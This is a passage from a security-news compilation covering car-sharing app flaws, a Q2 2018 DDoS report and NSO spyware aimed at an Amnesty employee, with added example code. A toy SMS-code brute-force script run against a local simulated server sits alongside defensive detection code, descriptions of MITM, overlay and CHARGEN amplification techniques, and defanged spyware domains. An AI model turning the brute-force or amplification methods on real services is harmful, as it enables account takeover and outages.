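    """Same six characters with digits allowed in any position."""
    return 36 ** 6


def requests_per_second_needed(keyspace: int, lifetime_s: float) -> float:
    """Rate an attacker must sustain to exhaust the keyspace within one code lifetime."""
    return keyspace / lifetime_s


class ManualClock:
    """Deterministic clock so the lifetime check can be exercised without sleeping."""
    def __init__(self) -> None:
        self.now = 0.0

    def __call__(self) -> float:
        return self.now


class SmsCodeServer:
    """Toy server side of phone-number + SMS-code authentication."""

    def __init__(self, max_attempts=None, lifetime_s=CODE_LIFETIME_S, clock=None):
        self.max_attempts = max_attempts   # None reproduces the unlimited behaviour observed
        self.lifetime_s = lifetime_s
        self.clock = clock or ManualClock()
        self._pending = {}                 # phone -> [code, issued_at, attempts]

    def request_code(self, phone: str) -> str:
        code = f"{secrets.randbelow(pin_keyspace()):0{PIN_DIGITS}d}"
        self._pending[phone] = [code, self.clock(), 0]
        return code  # really sent by SMS; returned here so a caller can play the victim

    def verify(self, phone: str, guess: str) -> bool:
        entry = self._pending.get(phone)
        if entry is None:
            return False
        code, issued_at, attempts = entry
        if self.clock() - issued_at > self.lifetime_s:
            del self._pending[phone]       # expired: a new code must be requested
            return False
        if self.max_attempts is not None and attempts >= self.max_attempts:
            return False                   # locked until a fresh code is issued
        entry[2] = attempts + 1
        if hmac.compare_digest(code, guess):   # constant-time comparison
            del self._pending[phone]       # one-time use
            return True
        return False


def brute_force(server: SmsCodeServer, phone: str):
    """Attacker: walk the whole keyspace in order. Returns (success, attempts_made)."""
    for n in range(pin_keyspace()):
        if server.verify(phone, f"{n:0{PIN_DIGITS}d}"):
            return True, n + 1
    return False, pin_keyspace()


if __name__ == "__main__":
    victim = "+70000000000"  # placeholder number
    open_server = SmsCodeServer()
    code = open_server.request_code(victim)
    print("unlimited server:", brute_force(open_server, victim), "code was", code)
    capped = SmsCodeServer(max_attempts=MAX_ATTEMPTS)
    code = capped.request_code(victim)
    print("capped server:", brute_force(capped, victim), "code was", code)
    rate = requests_per_second_needed(pin_keyspace(), CODE_LIFETIME_S)
    print(f"rate needed to exhaust {PIN_DIGITS} digits in {CODE_LIFETIME_S:.0f}s: {rate:.1f} req/s")
```

Against the unlimited server the attacker always wins, needing only about 83 requests per second to cover all 10,000 codes inside the two-minute window; against the capped server the success probability per code drops to MAX_ATTEMPTS / 10,000, and repeated code requests for one number are themselves a signal worth alerting on. The same logic is why the attempt cap matters more than the code length: the second app's 45.7 million-combination template is larger, but without a cap it is only a matter of time.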

MITM attack
It’s worth noting that the applications use HTTPS to communicate with their back-end servers, so it may take quite a while to figure out the communication protocol. To make our ‘attack’ faster, we resorted to an MITM attack, aided by another widespread flaw: none of the tested applications validates the server’s TLS certificate, so an interception proxy presenting its own certificate is accepted without complaint. We were able to obtain a dump of the entire session.

Screenshot of a successful MITM attack. HTTPS traffic dump was obtained

Protection from overlaying
Of course, it’s much faster and more effective (from the attacker’s point of view) if an Android device can be infected, i.e., the authorization SMS can be intercepted, so the attacker can instantly log in on another device. If there’s a complex password, then the attacker can hijack the app’s launch by showing a fake window with entry fields for login details that covers the genuine app’s interface. None of the applications we analyzed could counter this sort of activity. If the operating system version is old enough, privileges can be escalated and, in some cases, the required data can be extracted.

Outcome
The situation is very similar to what we found surrounding Connected Car applications. It appears that app developers don’t fully understand the current threats to mobile platforms – that goes for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying users of suspicious activities – only one service currently sends notifications to users about attempts to log in to their account from a different device. The majority of the applications we analyzed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not just very similar to each other but are actually based on the same code.

Russian car sharing operators could learn a thing or two from their colleagues in other countries. For example, a major player in the market of short-term car rental only allows clients to access a car with a special card – this may make the service less convenient, but dramatically improves security.

Advice for users
Don’t make your phone number publicly available (the same goes for your email address)
Use a separate bank card for online payments, including car sharing (a virtual card also works) and don’t put more money on it than you need.
If your car sharing service sends you an SMS with a PIN code for your account, contact the security service and disconnect your bank card from that account.
Do not use rooted devices.
Use a security solution that will protect you from cybercriminals who steal SMSs. This will make life harder not only for free riders but also for those interested in intercepting SMSs from your bank.
Recommendations to car sharing services
Use commercially available packers and obfuscators to complicate reverse engineering. Pay special attention to integrity control, so the app can’t be modified.
Use mechanisms to detect operations on rooted devices.
Allow the user to create their own credentials; ensure all passwords are strong.
Notify users about successful logons from other devices.
Switch to PUSH notifications: it’s still rare for malware to monitor the Notification bar in Android.
Protect your application interface from being overlaid by another app.
Add a server certificate check.


DDoS attacks in Q2 2018
2.8.2018 Kaspersky  Attack

CONTENTS
News overview
Q2 2018 news includes: non-standard use of old vulnerabilities, new botnets, the cutthroat world of cryptocurrencies, a high-profile DDoS attack (or not) with a political subtext, the slashdot effect, some half-baked attempts at activism, and a handful of arrests. But first things first.

Knowing what we know about the devastating consequences of DDoS attacks, we are not inclined to celebrate when our predictions come true. Alas, our forecast in the previous quarter’s report was confirmed: cybercriminals continue to seek out new non-standard amplification methods. Even before the panic over the recent wave of Memcached-based attacks had subsided, experts discovered an amplification method using another vulnerability—in the Universal Plug and Play protocol, known since 2001. It allows garbage traffic to be sent from several ports instead of just one, switching them randomly, which hinders the blocking process. Experts reported two attacks (April 11 and 26) in which this method was likely used; in the first instance, the DNS attack was amplified through UPnP, and in the second the same was applied to an NTP attack. In addition, the Kaspersky DDoS Protection team observed an attack that exploited a vulnerability in the CHARGEN protocol. A slightly weaker attack using the same protocol to amplify the flood (among other methods) targeted the provider ProtonMail, the reason for which was an unflattering comment made by the company’s executive director.

New botnets are causing more headaches for cybersecurity specialists. A noteworthy case is the creation of a botnet formed from 50,000 surveillance cameras in Japan. And a serious danger is posed by a new strain of the Hide-n-Seek malware, which was the first of all known bots to withstand, under certain circumstances, a reboot of the device on which it had set up shop. True, this botnet has not yet been used to carry out DDoS attacks, but experts do not rule out such functionality being added at a later stage, since the options for monetizing the botnet are not that many.

One of the most popular monetization methods remains attacking cryptocurrency sites and exchanges. What’s more, DDoS attacks are used not only to stop competitors from attracting investors, but as a way of making a big haul. The incident with the cryptocurrency Verge is a case in point: in late May, a hacker attacked Verge mining pools, and made off with XVG 35 million ($1.7 million). In the space of two months, the currency was hacked twice, although the preceding attack was not a DDoS.

Not only that, June 5 saw cybercriminals bring down the Bitfinex cryptocurrency exchange, with the system crash followed by a wave of garbage traffic, pointing to a multistage attack that was likely intended to undermine credibility in the site. It was probably competitive rivalry that caused the renowned online poker site, Americas Cardroom, to suffer a DDoS attack that forced first the interruption and then cancellation of a tournament. That said, it was rumored that the attack could have been a political protest against the in-game availability of Donald Trump and Kim Jong Un avatars.

As always, the most media hype in the past quarter was generated by politically motivated DDoS attacks. In mid-April, British and US law enforcement bodies warned that a significant number of devices had been seized by Russian (supposedly Kremlin-sponsored) hackers in the US, the EU, and Australia with a view to carrying out future attacks. Then just a few days later, in late April, it was a Russian target that got hit: the site of the largest Russian political party, United Russia, was down for two whole days, yet there was precious little public speculation about the masterminds behind the DDoS campaign.

An attack on the Danish railway company DSB, which struggled to serve passengers for several days as a result, was also alleged to be politically motivated. Some see it as a continuation of the attack on Swedish infrastructure last fall.

At the end of the quarter, attention was focused on the Mexican elections and an attack on an opposition party website hosting materials about the illegal activities of a rival. According to the victim, the attack began during a pre-election debate when the party’s candidate showed viewers a poster with the website address. However, it was immediately rumored that DDoS was not the culprit, but the Slashdot effect, which Reddit users also call “the hug of death.” This phenomenon has been around since the dawn of the Internet, when bandwidth was a major issue. But it’s still encountered to this day when a small resource suffers a major influx of legitimate web traffic on the back of media hype.

The Slashdot effect was also observed by the Kaspersky DDoS Protection team in early summer. After a press conference by the Russian president, a major news outlet covering the event experienced a powerful wave of tens of thousands of HTTP GET requests all sent simultaneously. The size of the supposed botnet suggested a new round of attacks involving IoT devices, but further analysis by KDP experts showed that the User-Agent HTTP header of all suspicious requests contained the substring “XiaoMi MiuiBrowser”. In fact, owners of Xiaomi phones with the browser app installed had received a push notification about the outcome of the conference, and it seems that many took an interest and followed the link, causing a glut of requests.
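The kind of triage described above, telling a flash crowd from a bot flood by breaking a request burst down by client software, is easy to reproduce on a web server's own access log. The following is an added example, not Kaspersky/KDP code: the access-log lines are constructed in Combined Log Format, and every User-Agent string in them is invented except for the “XiaoMi MiuiBrowser” substring the report quotes.

```python
"""Break down an HTTP request burst by client software family.

Added example, not Kaspersky/KDP code. The access-log lines below are
constructed in Combined Log Format; the User-Agent strings are invented
except for the "XiaoMi MiuiBrowser" substring quoted in the report.
"""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Families are matched in order: the MIUI browser UA also contains "Chrome/",
# so the more specific substring has to be tested first.
UA_FAMILIES = [
    ("MiuiBrowser", "XiaoMi MiuiBrowser"),
    ("Chrome", "Chrome/"),
    ("curl", "curl/"),
]

def ua_family(user_agent: str) -> str:
    for name, needle in UA_FAMILIES:
        if needle in user_agent:
            return name
    return "other"

def summarize_user_agents(lines):
    """Return {family: {"requests": n, "clients": number of distinct source IPs}}."""
    summary = defaultdict(lambda: {"requests": 0, "clients": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip malformed lines
        fam = ua_family(m.group("ua"))
        summary[fam]["requests"] += 1
        summary[fam]["clients"].add(m.group("ip"))
    return {k: {"requests": v["requests"], "clients": len(v["clients"])}
            for k, v in summary.items()}

def dominant_family(summary):
    """(family, share of all requests, requests per distinct client).

    A flash crowd triggered by a push notification shows up as one client
    family with roughly one request per client; a bot flood more often has
    a mixed or spoofed UA set and many requests per source address.
    """
    total = sum(v["requests"] for v in summary.values())
    fam, stats = max(summary.items(), key=lambda kv: kv[1]["requests"])
    return fam, stats["requests"] / total, stats["requests"] / stats["clients"]

MIUI_UA = ("Mozilla/5.0 (Linux; U; Android 7.0; MI 5 Build/NRD90M) AppleWebKit/537.36 "
           "(KHTML, like Gecko) Version/4.0 Chrome/61.0.3163.128 Mobile Safari/537.36 "
           "XiaoMi MiuiBrowser/9.5.3")
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "Chrome/67.0.3396.99 Safari/537.36")

def _line(ip, ua, path="/news/press-conference"):
    return f'{ip} - - [07/Jun/2018:13:02:11 +0300] "GET {path} HTTP/1.1" 200 51234 "-" "{ua}"'

# Constructed sample: six phones with the same browser, two desktops, one script.
SAMPLE_LOG = [_line(f"198.51.100.{i}", MIUI_UA) for i in range(1, 7)] + [
    _line("203.0.113.7", CHROME_UA),
    _line("203.0.113.8", CHROME_UA, "/"),
    _line("192.0.2.9", "curl/7.58.0", "/robots.txt"),
]

if __name__ == "__main__":
    s = summarize_user_agents(SAMPLE_LOG)
    print(s)
    print(dominant_family(s))
```

On the constructed sample the MIUI browser family carries two thirds of the requests with exactly one request per client, which is the signature of a legitimate crowd following a link rather than a botnet hammering the site.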

Meanwhile, law enforcement agencies have been making every effort to prevent organized attacks: in late April, Europol managed to shut down Webstresser.org, the world’s largest DDoS-for-hire service. When it was finally blocked, the portal had more than 136,000 users and had served as the source of more than 4 million DDoS attacks in recent years. After the fall of Webstresser, conflicting trends were reported: some companies observed a significant decline in DDoS activity in Europe (although they warned that the drop was going to be relatively short-lived); others, however, pointed to a rise in the number of attacks across all regions, which may have been the result of attackers seeking to compensate by creating new botnets and expanding old ones.

On top of that, several DDoS attack masterminds were caught and convicted. German hacker ZZboot was sentenced for attacking major German and British firms with ransom demands. However, he avoided jail time, receiving 22 months of probation. At the other end of the Eurasian continent, in Taipei, a hacker named Chung was arrested for allegedly attacking the Taiwan Bureau of Investigation, the Presidential Administration, Chunghwa Telecom, and the Central Bank. In the other direction, across the pond, a self-proclaimed hacktivist was arrested in the US for obstructing the work of police in Ohio.

Another, less significant, but more curious arrest took place in the US: an amateur hacker from Arizona was arrested, fined, and jailed after an online acquaintance posted a tweet with his name. Despite his rudimentary skills, the cybercriminal, calling himself the “Bitcoin Baron,” had terrorized US towns for several years, crashing the websites of official institutions and demanding ransoms; in one incident, his actions seriously hindered emergency response services. He too tried to position himself as a cyberactivist, but his bad behavior ruined any reputation he might have had, especially his alleged (only by himself, it should be said) attempt to bring down the site of a children’s hospital by flooding it with child pornography.

Quarter trends
In H1 2018, the average and maximum attack power fell significantly compared to H2 2017. This can be explained by the seasonal slowdown that is usually observed at the start of the year. However, a comparison of H1 indicators for 2017 and 2018 shows a measurable rise in attack power since last year.

Change in DDoS attack power, 2017-2018

One way to increase the attack power is third-party amplification. As mentioned in the news overview, hackers continue to look for ways to amplify DDoS attacks through new (or well-forgotten old) vulnerabilities in widely popular software, not without success, unfortunately. This time, the KDP team detected and repelled an attack with a capacity in the tens of Gbit/s that exploited a vulnerability in the CHARGEN protocol—an old and very simple protocol described in RFC 864 way back in 1983.

CHARGEN was intended for testing and measurement purposes, and can listen on both TCP and UDP sockets. In UDP mode, the CHARGEN server responds to any incoming datagram with a packet containing a random string of 0 to 512 ASCII characters. Attackers abuse this by sending requests to a vulnerable CHARGEN server with the source address spoofed to that of the victim, so that the much larger replies are delivered to the victim. US-CERT estimates the amplification factor at 358.8x, but this figure is somewhat arbitrary, since the response lengths are random.

Despite the protocol’s age and limited scope, many open CHARGEN servers can be found on the Internet. They are mainly printers and copying devices in which the network service is enabled by default in the software.

The use of CHARGEN in UDP attacks, as reported by KDP and other providers (Radware, Nexusguard), may indicate that attacks using more convenient protocols (for example, DNS or NTP) are becoming less effective, since there exist well-developed methods to combat this kind of UDP flooding. But the simplicity of such attacks makes cybercriminals unwilling to abandon them; instead they hope that modern security systems will not be able to resist antiquated methods. And although the search for non-standard holes will doubtless continue, CHARGEN-type amplification attacks are unlikely to take the world by storm, since vulnerable servers lack a source of replenishment (how often are old copiers connected to the Internet?).
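From the defender's side, CHARGEN reflection has a recognisable shape in flow data: many distinct hosts all answering from UDP port 19 with large datagrams to a destination that never asked them anything. The following is an added example, not Kaspersky/KDP code; the flow records, the one-line `src:sport > dst:dport proto packets bytes` format and the thresholds are constructed for illustration rather than taken from any real exporter.

```python
"""Spot UDP CHARGEN (port 19) reflection traffic in flow records.

Added example, not Kaspersky/KDP code. The flow records and thresholds are
constructed for illustration; the line format 'src:sport > dst:dport proto
packets bytes' is an assumption, not a real exporter's output.
"""
from collections import defaultdict
from dataclasses import dataclass

CHARGEN_PORT = 19
MAX_CHARGEN_PAYLOAD = 512   # RFC 864: a UDP reply carries 0 to 512 characters

@dataclass
class Flow:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str
    packets: int
    bytes: int

def parse_flow(line: str) -> Flow:
    """Parse one constructed 'src:sport > dst:dport proto packets bytes' record."""
    src, _, dst, proto, pkts, nbytes = line.split()
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return Flow(src_ip, int(src_port), dst_ip, int(dst_port), proto, int(pkts), int(nbytes))

def chargen_reflection_report(lines, min_reflectors=3, min_avg_bytes=200):
    """Group UDP flows *from* port 19 by destination.

    A victim of CHARGEN amplification receives replies from many distinct
    reflectors, all sourced from UDP/19 and all large (a CHARGEN datagram
    averages hundreds of bytes, far above the spoofed request).  Returns
    {victim_ip: (reflector_count, total_bytes, avg_bytes_per_packet)} for
    destinations that cross both thresholds.
    """
    per_victim = defaultdict(lambda: {"reflectors": set(), "bytes": 0, "packets": 0})
    for line in lines:
        f = parse_flow(line)
        if f.proto != "UDP" or f.src_port != CHARGEN_PORT:
            continue
        rec = per_victim[f.dst_ip]
        rec["reflectors"].add(f.src_ip)
        rec["bytes"] += f.bytes
        rec["packets"] += f.packets
    report = {}
    for victim, rec in per_victim.items():
        avg = rec["bytes"] / rec["packets"]
        if len(rec["reflectors"]) >= min_reflectors and avg >= min_avg_bytes:
            report[victim] = (len(rec["reflectors"]), rec["bytes"], round(avg, 1))
    return report

# Constructed sample: four reflectors flooding 203.0.113.10, a benign DNS
# reply, a TCP CHARGEN test session and a lone UDP/19 reply elsewhere.
SAMPLE_FLOWS = [
    "198.51.100.11:19 > 203.0.113.10:40212 UDP 3 1380",
    "198.51.100.12:19 > 203.0.113.10:40212 UDP 2 1024",
    "198.51.100.13:19 > 203.0.113.10:40212 UDP 4 1900",
    "198.51.100.14:19 > 203.0.113.10:40212 UDP 1 512",
    "192.0.2.53:53 > 203.0.113.10:51000 UDP 1 96",
    "198.51.100.15:19 > 203.0.113.20:50022 TCP 5 400",
    "198.51.100.16:19 > 203.0.113.20:33000 UDP 1 300",
]

if __name__ == "__main__":
    print(chargen_reflection_report(SAMPLE_FLOWS))
```

Only the destination with several reflectors and a high bytes-per-packet ratio is reported; the DNS reply, the TCP session and the single stray UDP/19 datagram are left alone. In practice the same two facts suggest the mitigations: drop inbound UDP traffic sourced from port 19 at the edge, since no modern service needs it, and disable the CHARGEN service on printers and copiers that ship with it enabled.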

If cybercriminals are going retro in terms of methods, when it comes to targets they are breaking new ground. DDoS attacks against home users are simple, but not profitable, whereas attacks on corporations are profitable, but complex. Now DDoS planners have found a way to get the best of both worlds—in the shape of the online games industry and streamers. Let’s take as an example the growing popularity of e-sports tournaments, in which the victors walk away with tens—sometimes hundreds—of thousands of dollars. The largest events are usually held at special venues with specially set-up screens and stands for spectators, but the qualifying rounds to get there often involve playing from home. In this case, a well-planned DDoS attack against a team can easily knock it out of the tournament at an early stage. The tournament server might also be targeted, and the threat of disruption could persuade the competition organizers to pay the ransom. According to Kaspersky Lab client data, DDoS attacks on e-sports players and sites with the goal of denying access are becoming increasingly common.

Similarly, cybercriminals are trying to monetize the market of video game streaming channels. Streaming pros show live playthroughs of popular games, and viewers donate small sums to support them. Naturally, the larger the audience, the more money the streamer gets for each broadcast; top players can earn hundreds or thousands of dollars, which basically makes it their job. Competition in this segment is fierce and made worse by DDoS attacks with the capacity to interfere with livestreams, causing subscribers to look for alternatives.

Like e-sports players, home streamers have virtually no means of protection against DDoS attacks. They are essentially reliant on their Internet provider. The only solution at present could be to set up specialized platforms offering greater protection.

Methodology
Kaspersky Lab has extensive experience of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor the actions of botnets using the Kaspersky DDoS Intelligence system.

The DDoS Intelligence system is part of the Kaspersky DDoS Protection solution, and intercepts and analyzes commands sent to bots from C&C servers. What’s more, the system is proactive, not reactive—there’s no need to wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q2 2018.

In the context of this report, an incident is treated as a separate (single) DDoS attack as long as the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more between activity periods, the incident is counted as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.
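The counting rule above is simple to state but easy to get wrong when activity periods overlap or arrive out of order. The following is an added example, not Kaspersky code, that applies the rule exactly as the text's worked example puts it: activity of one botnet against one target is a single attack while gaps stay under 24 hours, a gap of 24 hours or more starts a new attack, and different botnets against the same target are always counted separately. The activity periods are constructed.

```python
"""Count DDoS attacks the way the report's methodology describes.

Added example, not Kaspersky code. Activity periods below are constructed.
Rule applied, following the text's worked example: consecutive activity of
the same botnet against the same target is one attack while gaps stay
under 24 hours; a gap of 24 hours or more starts a new attack. Different
botnets hitting the same target are always separate attacks.
"""
from collections import defaultdict
from datetime import datetime, timedelta

MERGE_GAP = timedelta(hours=24)

def count_attacks(periods):
    """periods: iterable of (start, end, botnet_id, target_ip).

    Returns {(botnet_id, target_ip): number_of_attacks}.
    """
    by_pair = defaultdict(list)
    for start, end, botnet, target in periods:
        by_pair[(botnet, target)].append((start, end))

    counts = {}
    for key, spans in by_pair.items():
        spans.sort()                          # order by start time
        attacks = 1
        current_end = spans[0][1]
        for start, end in spans[1:]:
            if start - current_end >= MERGE_GAP:
                attacks += 1                  # quiet for a full day: a new attack
            current_end = max(current_end, end)   # overlapping periods extend the run
        counts[key] = attacks
    return counts

def total_attacks(periods):
    return sum(count_attacks(periods).values())

def unique_targets(periods):
    """Unique targets are counted per IP address, as in the report."""
    return len({target for _, _, _, target in periods})

T0 = datetime(2018, 4, 11, 0, 0)
H = timedelta(hours=1)
# Constructed sample: botnet A hits target X twice within a day, then again
# exactly 24 h after going quiet; botnet B hits X once; A also hits Y.
SAMPLE_PERIODS = [
    (T0,          T0 + 3 * H,  "botnet-A", "203.0.113.5"),
    (T0 + 6 * H,  T0 + 8 * H,  "botnet-A", "203.0.113.5"),
    (T0 + 32 * H, T0 + 34 * H, "botnet-A", "203.0.113.5"),
    (T0 + 34 * H, T0 + 35 * H, "botnet-A", "203.0.113.5"),
    (T0 + 1 * H,  T0 + 2 * H,  "botnet-B", "203.0.113.5"),
    (T0 + 2 * H,  T0 + 4 * H,  "botnet-A", "203.0.113.9"),
]

if __name__ == "__main__":
    print(count_attacks(SAMPLE_PERIODS))
    print(total_attacks(SAMPLE_PERIODS), unique_targets(SAMPLE_PERIODS))
```

The sample yields four attacks against two unique targets: botnet A's third period begins exactly 24 hours after its second one ended, so it opens a second attack, whereas its fourth period follows immediately and merges into that one.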

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools for performing DDoS attacks, and that the data presented in this report do not cover every single DDoS attack that occurred during the period under review.

Quarter results
The stormiest period for DDoS attacks was the start of the quarter, particularly mid-April. By contrast, late May and early June were fairly quiet.
Top spot in terms of number of attacks was retained by China (59.03%), with Hong Kong (17.13%) in second. It also entered the Top 3 by number of unique targets with 12.88%, behind only China (52.36%) and the US (17.75%).
The attacks were quite evenly distributed across the days of the week. The most and least popular were Tuesday and Thursday, respectively, but the difference is slight.
The share of SYN attacks rose sharply to 80.2%; second place went to UDP attacks with 10.6%.
The share of attacks from Linux botnets increased significantly to 94.47% of all single-family attacks.
Geography of attacks
The latest quarter threw up a number of surprises. The leader by number of attacks is still China, with its share practically unchanged (59.03% against 59.42% in Q1). However, for the first time since monitoring began, Hong Kong broke into the Top 3, rising from fourth to second: its share increased almost fivefold, from 3.67% to 17.13%, squeezing out the US (12.46%) and South Korea (3.21%), whose shares declined by roughly 5 p.p. each.

Another surprise package in the territorial ranking was Malaysia, which shot up to fifth place, now accounting for 1.30% of all DDoS attacks. It was joined in the Top 10 by Australia (1.17%) and Vietnam (0.50%), while the big-hitters Japan, Germany, and Russia all dropped out. Britain (0.50%) and Canada (0.69%) moved into eighth and seventh, respectively.

The Top 10 in Q2 also had a greater share of the total number of attacks than in Q1: 96.44% compared with 95.44%.

Distribution of DDoS attacks by country, Q1 and Q2 2018

The territorial distribution of unique targets roughly corresponds to the distribution of the number of attacks: China has the largest share (52.36%), a rise of 5 p.p. against the previous quarter. Second place belongs to the US (17.5%) and third to Hong Kong (12.88%), up from fourth, replacing South Korea (4.76%) (note that in Hong Kong the most popular targets are now Microsoft Azure servers). Britain fell from fourth to eighth, now accounting for 0.8% of unique targets.

The Top 10 said goodbye to Japan and Germany, but welcomed Malaysia (2.27%) in fourth place and Australia (1.93%) just behind in fifth. This quarter’s Top 10 accounted for slightly more of the total number of unique attacks, reaching 95.09% against 94.17% in Q1.

Distribution of unique DDoS-attack targets by country, Q1 and Q2 2018

Dynamics of the number of DDoS attacks
Peak activity in Q2 2018 was observed in mid-April: a significant increase in the number of attacks was registered in the middle third of this month, with two large spikes occurring just days apart: April 11 (1163) and April 15 (1555). The quarter’s deepest troughs came in the second half and at the end: the calmest days were May 24 (13) and June 17 (16).

Dynamics of the number of DDoS attacks, Q2 2018

In Q2 2018, Sunday went from being the quietest day for cybercriminals to the second most active: it accounted for 14.99% of attacks, up from 10.77% in the previous quarter. But gold in terms of number of attacks went to Tuesday, which braved 17.49% of them. Thursday, meanwhile, went in the opposite direction: only 12.75% of attacks were logged on this day. Overall, as can be seen from the graph, in the period April-June the attack distribution over the days of the week was more even than at the beginning of the year.

Distribution of DDoS attacks by day of the week, Q1 and Q2 2018

Duration and types of DDoS attacks
The longest attack in Q2 lasted 258 hours (almost 11 days), slightly short of the previous quarter’s record of 297 hours (12.4 days). This time, the focus of persevering hackers was an IP address belonging to China Telecom.

Overall, the share of long-duration attacks fell by 0.02 p.p. to 0.12%. Whereas the share of attacks lasting from 100 to 139 hours remained the same, the share of attacks from 10 to 50 hours almost doubled (from 8.28% to 16.27%); meanwhile, the share of attacks lasting from five to nine hours increased by nearly half (from 10.73% to 14.01%). The share of short-duration attacks (up to four hours) fell sharply from 80.73% in January to 69.49% in March.

Distribution of DDoS attacks by duration (hours), Q1 and Q2 2018

All other types of attacks decreased in share; UDP attacks are in second place (10.6%), while TCP, HTTP, and ICMP constitute a relatively small proportion.

Distribution of DDoS attacks by type, Q2 2018

Correlation between Windows- and Linux-based botnet attacks, Q2 2018

Geographical distribution of botnets
The Top 10 regions by number of botnet C&C servers underwent some significant changes. Top spot went to the US with almost half of all C&C centers (44.75% against 29.32% in Q1). South Korea (11.05%) sank from first to second, losing nearly 20 p.p. China also dropped significantly (from 8.0% to 5.52%). Its place was taken by Italy, whose share climbed from 6.83% in the previous quarter to 8.84%. The Top 10 saw the departure of Hong Kong, but was joined—for the first time since our records began—by Vietnam, whose 3.31% was good enough for seventh place.

Distribution of botnet C&C servers by country, Q2 2018

Conclusion
In Q2 2018, cybercriminals continued the above-outlined trend of searching for exotic holes in UDP transport protocols. It surely won’t be long before we hear about other sophisticated methods of attack amplification.

Another technical discovery of note is the potential for creating botnets using the UPnP protocol; although evidence for them exists, they are still extremely rare in the wild, fortunately.

Windows botnet activity decreased: in particular, Yoyo activity experienced a multifold drop, and Nitol, Drive, and Skill also declined. Meanwhile, Xor for Linux significantly increased its number of attacks, while another infamous Linux botnet, Darkai, scaled back slightly. As a result, the most popular type of attack was SYN flooding.

The total attack duration changed little since the previous quarter, but the share of medium-duration attacks increased, while the share of shorter ones decreased. The intensity of attacks also continues to grow. The most lucrative targets for cybercriminals seem to be cryptocurrencies, but we can soon expect to see high-profile attacks against e-sports tournaments as well as relatively small ransoms targeting individual streamers and players. Accordingly, there will be market demand for affordable individual anti-DDoS protection.


Amnesty International employee targeted with NSO group surveillance malware
2.8.2018 securityweek Virus

An employee at Amnesty International has been targeted with Israeli surveillance malware, the human rights group has revealed.
Amnesty International revealed that one of its employees was targeted with surveillance malware developed by an Israeli firm.

The human rights group published a report that provides details on the attack against its employee. The hacker attempted to compromise the mobile device of a staff member in early June by sending him a WhatsApp message about a protest in front of the Saudi Embassy in Washington.

This SMS message translates to:

“Court order #XXXXXX issued against identity owner **** on XX/XX/XXX”

[link]”


The organization added that such attacks are becoming ever more frequent, with a growing amount of Israeli surveillance software being used to spy on human rights defenders and opposition figures in the Middle East and beyond.

Amnesty International traced the malicious link in the message to the surveillance network of the Israeli firm NSO Group.

“In June 2018, an Amnesty International staff member received a malicious WhatsApp message with Saudi Arabia-related bait content and carrying links Amnesty International believes are used to distribute and deploy sophisticated mobile spyware. Through the course of our subsequent investigation we discovered that a Saudi activist based abroad had also received similar malicious messages.” reads the report published by Amnesty International.

“In its analysis of these messages, Amnesty International found connections with a network of over 600 domain names. Not only are these domain names suspicious, but they also overlap with infrastructure that had previously been identified as part of Pegasus, a sophisticated commercial exploitation and spyware platform sold by the Israel surveillance vendor, NSO Group.”

The servers identified by the experts matched the description of Pegasus given in NSO Group material found among the leaked Hacking Team documents. The researchers also found two other connections to NSO Group:

evidence linking the malicious links collected by Amnesty International with NSO Group network infrastructure previously detailed by researchers at Citizen Lab;
a domain registration pattern showing that most of the domains in the NSO Group infrastructure were registered during Israeli working days and hours.
“With the technique we developed, we were then able to identify over 600 servers that demonstrated similar behavior. Among these we found servers that hosted domain names that have been previously identified as connected to NSO Group by Citizen Lab and others, specifically banca-movil[.]com, pine-sales[.]com, and ecommerce-ads[.]org.” continues the report.
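The second connection, a registration pattern clustering in a particular working week, is the kind of weak attribution signal an analyst checks with a few lines of code once WHOIS creation timestamps are in hand. The following is an added example, not Amnesty International or Citizen Lab code. The domain names are defanged placeholders and the creation timestamps are constructed; the page gives neither. It assumes Israeli working days of Sunday to Thursday, office hours of 09:00 to 18:00, and a fixed UTC+2 offset in place of full daylight-saving handling.

```python
"""Test whether domain creation times cluster in a given working week.

Added example, not Amnesty International or Citizen Lab code. The domain
names and WHOIS creation timestamps below are constructed; the real
infrastructure and timestamps are not on the page. Assumptions: Israeli
working days are Sunday to Thursday, office hours 09:00-18:00, and a fixed
UTC+2 offset is used instead of full DST handling.
"""
from datetime import datetime, timezone, timedelta

LOCAL_TZ = timezone(timedelta(hours=2))        # Israel Standard Time, DST ignored
WORKING_DAYS = {6, 0, 1, 2, 3}                 # Python weekday(): Mon=0 ... Sun=6
OFFICE_HOURS = range(9, 18)                    # 09:00 <= hour < 18:00

def parse_whois_created(value: str) -> datetime:
    """Parse a 'YYYY-MM-DDTHH:MM:SSZ' creation stamp as an aware UTC datetime."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

def in_working_hours(created_utc: datetime) -> bool:
    local = created_utc.astimezone(LOCAL_TZ)
    return local.weekday() in WORKING_DAYS and local.hour in OFFICE_HOURS

def registration_pattern(records):
    """records: iterable of (domain, created_utc_string).

    Returns {"total": n, "in_working_hours": k, "share": k/n,
             "outside": [domains registered outside the assumed working week]}.
    """
    total = 0
    hits = 0
    outside = []
    for domain, created in records:
        total += 1
        if in_working_hours(parse_whois_created(created)):
            hits += 1
        else:
            outside.append(domain)
    return {"total": total, "in_working_hours": hits,
            "share": hits / total if total else 0.0, "outside": outside}

# Constructed sample (defanged placeholder names, not real infrastructure).
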